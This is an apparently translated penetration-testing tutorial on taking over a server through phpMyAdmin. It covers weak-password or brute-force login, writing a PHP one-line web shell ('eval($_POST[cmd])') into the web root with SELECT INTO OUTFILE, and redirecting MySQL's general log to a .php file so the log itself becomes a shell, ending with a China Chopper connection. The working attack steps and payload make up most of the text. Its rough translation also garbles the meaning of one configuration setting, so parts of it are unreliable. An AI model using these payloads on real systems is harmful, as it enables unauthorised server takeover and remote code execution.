PhpMyAdmin background getshell (penetration test)

The following is the tutorial column of phpmyadmin to introduce you to PhpMyAdmin background getshell (penetration test). I hope it will be helpful to friends in need!

PhpMyAdmin Introduction

PhpMyAdmin is based on PHP and structured in Web-Base. The MySQL database management tool on the website host allows administrators to use the Web interface to manage the MySQL database. This web interface can be a better way to input complex SQL syntax in a simple way, especially when it comes to importing and exporting large amounts of data.

After collecting and detecting the target information, when it is found that the phpmyadmin directory exists (try: http://ip:port/phpmyadmin/), then After entering the management background through a weak password (, you can directly try the account root password root) or brute force cracking, there are many ways to getshell.

into outfile export Trojan

If you want to insert a Trojan inside the website, the premise is that you have to know the absolute path of the website. There are many methods, such as obtaining the path by reporting an error, and passing phpinfo.php and so on (please refer to another blog post: https://blog.csdn.net/weixin_39190897/article/details/99078864).

The most convenient way is to use select @@basedir; to check directly (but sometimes you can’t find it out, you can only find other methods):

According to the above feedback, we can see that the location of MySQL is in the D:\soft\phpStudy\MySQL\ directory.

After obtaining the website path, you can attempt to upload the Trojan. The most commonly used method is to write a sentence of Trojan directly on the root directory of the website through into outfile:

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';

But in the new version In mysql, this sentence did not run successfully.

Mysql new features secure_file_priv will have an impact on reading and writing files. This parameter is used to limit import and export. We can use the show global variables like '%secure%'; command to view this parameter:

When secure_file_priv is NULL, it means that Mysql is not restricted Import and export are allowed, so an error occurs. To make the statement export successfully, you need to modify the my.ini file in the Mysql folder and add secure_file_priv ="" to [mysqld]:

When the value of secure_file_priv has no specific value, it means that there is no restriction on the import|export of mysqld, and the export command can be executed at this time.

Using Mysql log files

Mysql version 5.0 and above will create log files, and you can also getshell by modifying the global variables of the log. But you must also have read and write permissions on the generated logs. (Note: The personal test on Linux was unsuccessful due to permission issues). First, let’s introduce two MySQL global variables: general_log and general_log file.

1. general log refers to the log saving status, ON means open, OFF means closed;
2. general log file refers to the log save path.

Command to view log status: show variables like '%general%';
## In the above configuration, when general is turned on,
The executed sql statements will appear in the WIN-30DFNC8L78A.log file.

Then, if the value of general_log_file is modified, the executed sql statement will be generated correspondingly, and then getshell will be generated.

Correspondingly, the xxx.php file will be generated

Write a sentence Trojan into the xxx.php file: SELECT '<?php eval ($_POST["cmd"]);?>'

Then you can see the Trojan horse statements recorded in the log file:
Finally, China Chopper connects, getshell :

The above is the detailed content of PhpMyAdmin background getshell (penetration test). For more information, please follow other related articles on the PHP Chinese website!